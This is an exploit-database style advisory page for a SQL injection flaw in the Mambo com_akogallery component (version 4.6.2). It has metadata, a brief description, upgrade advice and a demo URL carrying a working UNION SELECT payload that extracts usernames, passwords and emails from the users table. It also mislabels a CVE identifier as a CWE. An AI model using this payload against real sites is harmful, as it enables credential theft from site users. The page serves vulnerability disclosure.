header-logo
Suggest Exploit
vendor:
Mambo
by:
Secunia Research
7,5
CVSS
HIGH
Mambo com_akogallery Remote Sql Injection Vulnerability
89
CWE
Product Name: Mambo
Affected Version From: 4.6.2
Affected Version To: 4.6.2
Patch Exists: YES
Related CWE: CVE-2006-4695
CPE: o:mambo:mambo
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2006

Mambo com_akogallery Remote Sql Injection Vulnerability

This vulnerability allows an attacker to inject malicious SQL commands into the vulnerable application. The vulnerable parameter is the ‘id’ parameter in the ‘com_akogallery’ component. By manipulating the ‘id’ parameter, an attacker can inject arbitrary SQL commands into the application. This vulnerability affects Mambo versions 4.6.2 and earlier.

Mitigation:

Upgrade to the latest version of Mambo.
Source

Exploit-DB raw data:

Mambo com_akogallery Remote Sql Injection Vulnerability

Demo:
http://server/index.php?option=com_akogallery&Itemid=91&func=detailgallerie&id=-10+UNION SELECT 1,2,concat(username,0x3a,password,0x3a,email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+mos_users

Navigation

Suggest Exploit

Services By CQR